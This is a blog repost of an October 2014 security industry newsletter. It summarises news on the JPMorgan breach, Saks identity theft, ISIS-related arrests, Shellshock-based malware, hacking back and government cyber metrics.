Search This Blog

Friday, October 10, 2014

Security Management Weekly - October 10, 2014

header

  Learn more! ->   sm professional  

October 10, 2014
 
 
Corporate Security
Sponsored By:
  1. "JPMorgan Hackers Said to Probe 13 Financial Firms"
  2. "ASIS, SIA Launch Joint Learning Management System" Security Industry Association
  3. "Identity Thieves Targeted Saks Customers, DA Says"
  4. "In Search of Security Metrics"
  5. "Managing Supply Chain Risk"

Homeland Security
Sponsored By:
  1. "Obama Weighs Options to Close Guantanamo"
  2. "U.S. Steps Up Fight to Block ISIS Volunteers" Islamic State of Iraq and Syria
  3. "Khorasan Terrorists Will Attack U.S. 'Very, Very Soon,' FBI Director Warns"
  4. "Four Arrested in London in Plot to Behead People on City Streets"
  5. "Chicago-Area Man Charged in Attempt to Join Islamic State in Syria"

Cyber Security
  1. "Cyberattacks Trigger Talk of 'Hacking Back'"
  2. "Malware 'Mayhem' Follows Emergence of Shellshock Vulnerability"
  3. "U.S. Cyber Command Plans to Recruit 6,000 Cyber Professionals, as U.S. Mulls Offensive Cyber Strategy"
  4. "DHS' Ozment Seeks the Best Metrics for New Cyber Scorecard"
  5. "How Does the Cloud Change Cybersecurity?"

   

 
 
 

 


JPMorgan Hackers Said to Probe 13 Financial Firms
Bloomberg (10/09/14) Riley, Michael; Robertson, Jordan

Evidence has emerged that the hackers behind a major breach of JPMorgan Chase's systems that exposed data from tens of millions of accounts also attempted to breach the systems of other major financial firms. At least 13 more financial firms have been identified as victims of the hackers, including Citigroup, HSBC Holdings, E*Trade, and the payroll firm Automatic Data Processing (ADP). Some of these attempts appear to have failed, but suggest that the hackers were active for a long time. E*Trade in particular was targeted by the group as long ago as last year. This in particular highlights that the financial sector, often recognized as a leader in cybersecurity information sharing efforts, is still hamstrung by a reluctance among companies to reveal that they have been hacked. John Pescatore of the SANS Institute says that one of the best ways to combat these kinds of hacking campaigns is information sharing, which allows companies and agencies to coordinate a response. But it was only after the JP Morgan breach was revealed that the wheels of the Financial Services Information and Analysis Center (FS-ISAC) began to turn, circulating information about the breach, such as the attackers' Internet Protocol (IP) addresses, to other companies. The failure of other victims to report their own breaches earlier may have allowed the hackers to continue their campaign, culminating in the JPMorgan breach.


ASIS, SIA Launch Joint Learning Management System
Security Director News (10/06/14)

ASIS International and the Security Industry Association (SIA) have created my Global Portal for Security (myGPS), a learning tool and information source for security industry professionals. myGPS provides a number of classroom and online training options for security professionals who want to improve their knowledge and performance. ASIS and SIA say the program will eventually include career tracking and management of ASIS and SIA certification. Both organizations will also offer new courses, learning materials, and career planning to support security industry insiders. "All security professionals will find value in the educational opportunities available through the myGPS learning management system, particularly those seeking to deepen their knowledge of security project management and perhaps start down the road of becoming a Certified Security Project Manager," says SIA Chairman John Stroia.


Identity Thieves Targeted Saks Customers, DA Says
Wall Street Journal (10/06/14) Morales, Mark

Five people, including employees of Saks Fifth Avenue's store in Manhattan, have been indicted on charges that they used information stolen from store customers to buy more than $400,000 worth of designer shoes and accessories. According to Manhattan District Attorney Cyrus Vance, the identity-theft ring allegedly operated between April and August, buying luxury goods that could be resold on the black market. Saks' operating company, Hudson's Bay Company, said the thefts affected 22 customers, all of whom have been notified and have had their accounts restored. But Vance said companies need to do more to protect their customers from such crimes. "These institutions, in trying to do a good job servicing their customers, need to have protocols in place so that they can assess whether or not their internal compliance and security is up to snuff," he said.


In Search of Security Metrics
Security Management (10/14) Ohlhausen, Peter E.

Metrics are increasingly being used by security professionals. Metrics are measurements that are gathered over a long period of time that ultimately shape decision making. A metrics-based approach to security offers personnel the ability to determine what works, the value of security features, and sync security goals. To help security professionals use metrics more effectively, the ASIS Foundation financed research intended to develop tools for discovering, developing, assessing, improving, and presenting security metrics. The result of that research was the ASIS Foundation Metrics Research Project. To understand how metrics were being used in the security industry, researchers polled 3,000 ASIS members. The survey found that 78 percent would use metrics if they knew how to create and use them. More than 50 percent requested more information from ASIS concerning metrics. As a result, Global Skills X-Change and Ohlhausen Research created the Security Metrics Evaluation Tool (Security MET), which is intended to help security personnel utilize metrics by providing nine criteria to evaluate a metric. The criteria fall under technical, operational, and strategic groups. Researchers also created summaries of metrics currently being used and guidelines to present to senior management.


Managing Supply Chain Risk
Security Technology Executive (10/14) Vol. 24, No. 4, P. 22 Passmore, Marty

Theft is becoming a bigger and bigger threat to the security of companies' supply chains. Thieves are targeting freight carrying a wide variety of goods that are worth hundreds of millions of dollars. The risk is made more difficult to address because industry regulations do not permit a sweeping approach to security. However, the Customs-Trade Partnership Against Terrorism (C-TPAT), Partners in Protection (PIP), and the EU Authorized Economic Operator (AEO) are working to bolster supply chain security across the globe. Security experts note one of the highest security risks often involves keeping products stored in warehouses safe. These are also the easiest risks to mitigate with the use of cages, trailer seals, and other physical security measures. Products are also at risk in transit from cargo theft gangs. To stay ahead of thieves, companies have implemented covert and overt GPS tracking of expensive items. This method can be active, with security tracking the shipments' every movement, or inactive, where alerts are sent to monitoring stations if a shipment does not meet certain thresholds or arrive at checkpoints at certain times. Physical escorts can also be used to accompany a shipment to its destination. That method is costly, but has also been proven to be the most effective.




Obama Weighs Options to Close Guantanamo
Wall Street Journal (10/09/14) Lee, Carol E.; Bravin, Jess

Senior Obama administration officials report that two options are under consideration that would allow the president to close the detention facility at Guantanamo Bay by overriding the congressional ban on bringing detainees to the U.S. One of those options involves forcing a showdown with Congress on the issue by vetoing the annual military policy bill to which the ban is attached. Alternatively, the president could sign the bill, but declare his intention to disregard the ban in a signing statement and then proceed to transfer prisoners and close the facility. However, the president reportedly prefers that Congress pass legislation that would close Gitmo, although he is also determined to close the facility and is said to be willing to consider all potential options for accomplishing that goal. A major part of the effort to close Guantanamo is arranging the release and repatriation of several detainees. More than half of the 149 men still held at the facility have been approved for release or transfer, but are still being held as the government works to craft deals to have them transferred to other nations or repatriated to their home countries. Should the administration move forward with one of those plans, the remaining prisoners would most likely be transferred to the military brig in Charleston, S.C., although other facilities are under consideration as well.


U.S. Steps Up Fight to Block ISIS Volunteers
New York Times (10/09/14) Schmidt, Michael S.

Federal authorities are increasingly tracking down, charging, and prosecuting Americans who are believed to be planning to travel to the Middle East to join terrorist groups like the Islamic State (IS). The Justice Department has charged 10 people who have made such travel plans so far this year, the most recent of which was Mohammed H. Khan, who was arrested at Chicago's O'Hare International Airport on Oct. 4 for allegedly planning to travel to Turkey to meet someone who promised to take him to join IS in either Syria or Iraq. Just five people were prosecuted for planning to travel overseas to join up with terrorist groups between 2011 and 2013. The effort to prevent Americans from going abroad to join terrorist organizations has been criticized by civil libertarians, who say it may actually be encouraging some radicalized individuals to make travel plans to join terrorist organizations by romanticizing jihad. Federal authorities deny that, and say the increased number of prosecutions of people traveling abroad for the purpose of joining a terrorist group is the result of heightened vigilance in identifying such individuals. The Justice Department also says it has no choice but to work to prevent Americans from making terrorism-related travel plans, as these individuals could receive training from terrorist groups that they could then use to carry out attacks against the American homeland.


Khorasan Terrorists Will Attack U.S. 'Very, Very Soon,' FBI Director Warns
Russia Today (Russia) (10/08/14)

FBI Director James Comey said in a recent "60 Minutes" interview that he believes the al-Qaida-linked Khorasan Group will launch an attack on the United States or its allies "very, very soon." Comey would not say more specifically when an attack would occur. He also pointed out that about "a dozen or so" American citizens are fighting in Syria for Islamic fundamentalist groups. The government says it knows their identities, and as American passport holders, they are free to reenter the United States. If they do reenter the country, Comey says the government will be tracking them carefully. A report by Associated Press said that Khorasan militants did not initially travel to Syria to fight against President Bashar Assad, but were under orders by al-Qaida leader Ayman al-Zawahiri to recruit Westerners with passports that allowed them to undergo less scrutiny from security officials when flying to the U.S.


Four Arrested in London in Plot to Behead People on City Streets
Homeland Security News Wire (10/08/14)

London police on Tuesday arrested four men who were allegedly involved in a terrorist plot to kidnap people on the streets of the British capital and behead them. One of the men is said to have links to Syria and the Islamic State (IS), a group which security analysts say may want to retaliate against Britain for its participation in airstrikes on IS targets in Iraq. According to one source, officers believe that the raids disrupted what might have become a "significant plot." The suspects had reportedly been under close surveillance for some time.


Chicago-Area Man Charged in Attempt to Join Islamic State in Syria
Reuters (10/07/14) Ortiz, Fiona

A Chicago-area man was in court Monday to face charges that he was attempting to provide support to the Islamic State (IS). Mohammed H. Khan was arrested at Chicago's O'Hare International Airport on Oct. 4 after he tried to board an Austrian Airlines flight to Istanbul. After his arrest, Khan admitted to federal agents that he planned to meet a contact in Turkey who would take him to territory controlled by IS. Khan said during his interview with federal agents that he planned to join the militant group "in some type of public service, a police force, humanitarian work, or a combat role." A search of Khan's home turned up notebooks in which he planned the trip and a note he left his family in which he exhorted them to follow his lead in joining IS. It is unclear how Khan initially came to the attention of authorities, although his travel plans may have been the source of their concerns. American officials, who are already closely monitoring young people flying from the U.S. to Turkey, may have become suspicious of Khan after he made plans to fly to Istanbul and stay there for two nights before returning home.




Cyberattacks Trigger Talk of 'Hacking Back'
Washington Post (10/10/14) Timberg, Craig; Nakashima, Ellen; Douglas-Gabriel, Danielle

The continuing attacks on U.S. corporate networks are firing talk among some executives and officials of going on the offensive, or "hacking back," against those that hack their systems. The measures under discussion tend to be limited to efforts to track and/or destroy stolen data. One idea involves tagging sensitive data with a beacon so that it could be tracked if stolen and potentially located and deleted before it is misused. The major problem, however, is that any such efforts would be, by their nature, illegal. FBI investigators have reported a tacit acknowledgement that some companies or their network administrators occasionally engage in illegal hack back activities that investigators choose not to acknowledge. More than one in three security professionals polled at the Black Hat USA conference in 2012 said they had engaged in retaliatory hacking on at least one occasion. However, the potential liabilities involved in such activities are considerable, and it is unlikely that major companies would ever openly adopt them as part of their security policies for that reason, according to Greg Garcia, the executive director of the Financial Services Sector Coordinating Council.


Malware 'Mayhem' Follows Emergence of Shellshock Vulnerability
eWeek (10/08/14) Lemos, Robert

A malicious program called Mayhem has started spreading to Linux and Unix servers using the "Shellshock" vulnerability in Bash, a terminal shell program. The attack currently is using servers at 47 different Internet locations, including 18 in the United States, to scan for vulnerable hosts. Although it is still unknown how many servers have been infected with the malware, a July analysis of the pre-Shellshock version found about 1,400 servers compromised by the program. "This is a very serious threat, please work and cooperate together...to stop the source of the threat," says anti-malware group Malware Must Die. Mayhem accomplishes its missions on Linux and Unix servers without gaining full control of the host system. The malware also uses a modular design so the software can be easily updated with new functionality. "Nowadays, there are millions of completely unprotected Web servers with different kinds of vulnerabilities, so it is easy for attackers to upload Web shells and gain access to them," say Yandex researchers.


U.S. Cyber Command Plans to Recruit 6,000 Cyber Professionals, as U.S. Mulls Offensive Cyber Strategy
Homeland Security News Wire (10/06/14)

U.S. Cyber Command is planning to step up its efforts to protect the nation's networks from cyberattackers. U.S. Cyber Command Deputy Commander Lt. Gen. James McLaughlin announced Oct. 2 that his unit is planning to recruit 6,000 cybersecurity professionals and create 133 teams of military and civilian personnel who will help support the Pentagon's cyber defense efforts. The teams will operate across all branches of the military. That marks a reversal from the current situation, in which all of the military's branches perform cyber defense responsibilities independently of one another. But McLaughlin, who made the announcement at a cybersecurity event, said more needs to be done to protect the nation from cyberattacks. For instance, technology companies need to develop new security tools that can help guard against attacks, while colleges and universities need to promote their cybersecurity programs so the nation has enough cybersecurity professionals, McLaughlin said.


DHS' Ozment Seeks the Best Metrics for New Cyber Scorecard
Federal News Radio (10/03/14) Miller, Jason

This is the first year that raising federal cybersecurity awareness is unnecessary, according to Andy Ozment, assistant secretary of the Department of Homeland Security's Office of Cybersecurity and Communications. "From all the breaches that have been in the news to what companies are seeing on their own networks and their understanding about the risks they have to manage, this is the year...that people recognize cybersecurity is important and cyberrisks are risks they have to manage," he says. Ozment's office plans to create a scorecard to measure agency progress in securing its systems. "I think we can have a scorecard or a dashboard that gives us reasonable confidence that we know how secure a department and agency is," Ozment says. The White House also is measuring agency cybersecurity as part of its cross-agency performance goals. In its most recent progress report, the White House reported 64 percent of all agencies are using strong smart card authentication to log onto their computers, 92 percent of agency Internet traffic passed through a TIC portal, and 91 percent of agencies have implemented the TIC capabilities. In addition, DHS is focused on cyber information-sharing, Ozment says. He also notes a third DHS priority is to sustain implementation and adoption of the cybersecurity framework to shield critical infrastructure stemming from President Obama's February 2013 executive order.


How Does the Cloud Change Cybersecurity?
Government Technology (10/03/14) Towns, Steve

Texas CISO Brian Engle says the use of cloud services and the emerging Internet of Things are changing the way cybersecurity is practiced, but not necessarily as much as one might think. Engle says the central problem of the cloud is not that companies and agencies lose direct control over security when switching to cloud services and security, but they often compound the problem by using multiple cloud providers, thus multiplying their uncertainty and risk exposure. The solution is to find a way to extend monitoring and response efforts across vendors, and getting all of a given organization's vendors to agree on the solution is the challenge. Engle also says the risks of the Internet of Things are largely known risks, and the danger is that no one takes any action to address them before they result in a major problem. To handle these risks, Engle says CIOs and CISOs need to be ready to communicate about them clearly and compellingly with executives, presenting facts and having answers.


Abstracts Copyright © 2014 Information, Inc. Bethesda, MD


  ASIS also offers a daily and a non-sponsored, special-content Professional Edition of
Security Newsbriefs. Please click to see a sample or to contact us for more information.

Unsubscribe | Change E-mail | Security Management Online | ASIS Online

No comments: